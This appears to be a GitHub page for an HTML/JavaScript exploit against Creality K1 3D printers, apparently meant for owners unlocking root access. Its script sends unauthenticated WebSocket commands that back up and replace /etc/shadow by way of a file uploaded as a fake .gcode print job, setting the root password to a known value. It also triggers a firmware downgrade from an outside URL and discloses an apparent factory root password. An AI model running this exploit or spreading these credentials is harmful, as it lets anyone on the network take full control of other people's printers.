forked from Tombraider2006/K1
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathk3d_k1_exploit.html
71 lines (64 loc) · 2.7 KB
/
k3d_k1_exploit.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
<html>
<head>
<title>K1 exploit v1.1 for K3D Chat</title>
<script>
const patchedShadowStr = "root:$5$/iMbCgHty3$rM7UZICj9tmUe13BcAOUgVvpa.sSMV4k/t2Yes64ZZ9:::::::\ndaemon:*:::::::\nbin:*:::::::\nsys:*:::::::\nsync:*:::::::\nmail:*:::::::\nwww-data:*:::::::\noperator:*:::::::\nnobody:*:::::::\ndbus:*:::::::\n"
const patchedShadowBlob = new Blob([patchedShadowStr], { type: "text/plain" })
function sendPayload(payload,needAlert = true) {
var ip = document.getElementsByName("ip")[0].value
var socket = new WebSocket('ws://' + ip + ':9999')
socket.onopen = function(e) {
socket.send(payload);
if (needAlert) {
setTimeout(function(){
if (socket.readyState === WebSocket.OPEN) {
alert('Payload sent!')
socket.close()
} else {
alert('Payload failed!')
}
}, 100)
}
}
}
function patchShadow() {
var ip = document.getElementsByName("ip")[0].value
console.log('Backing up current shadow file...')
sendPayload('{"method":"set","params":{"opGcodeFile":"renameprt:/etc/shadow:/etc/shadow.bak"}}', false)
setTimeout(function(){
console.log('Uploading new shadow file...')
const fd = new FormData()
fd.append('file', patchedShadowBlob, 'new_shadow.gcode')
const xhr = new XMLHttpRequest();
xhr.onload = function(e) {
if (xhr.status == 200) {
console.log('Applying new shadow file...')
sendPayload('{"method":"set","params":{"opGcodeFile":"renameprt:/usr/data/printer_data/gcodes/new_shadow.gcode:/etc/shadow"}}', false)
alert('Payload sent! New SSH credentials should be:\nroot:creality')
} else {
alert('Upload failed!')
}
}
xhr.open('POST', 'http://' + ip + '/upload/new_shadow.gcode', true);
xhr.send(fd)
}, 250)
}
function rollbackTo15() {
sendPayload('{"method":"set","params":{"linuxUpgrade":"https://ytkab0bp.ru/k3d/CR4CU220812S11_ota_img_V1.2.9.22.img"}}')
}
function moveShadow() {
sendPayload('{"method":"set","params":{"opGcodeFile":"renameprt:/usr/data/printer_data/gcodes/shadow.gcode:/etc/shadow"}}')
}
function reset() {
sendPayload('{"method":"set","params":{"resetSystem":15}}')
}
</script>
</head>
<body>
IP: <input type="text" name="ip"/><br>
Unlock SSH: <button onclick="patchShadow()">Method A</button> <button onclick="moveShadow()">Method B</button><br><br>
Reset system if something went wrong: <button onclick="reset()">Reset</button><br>
Rollback to 1.2.9.15: <button onclick="rollbackTo15()">Go!</button><br>
Note: vanilla root password seems to be 0755cxsw$888
</body>
</html>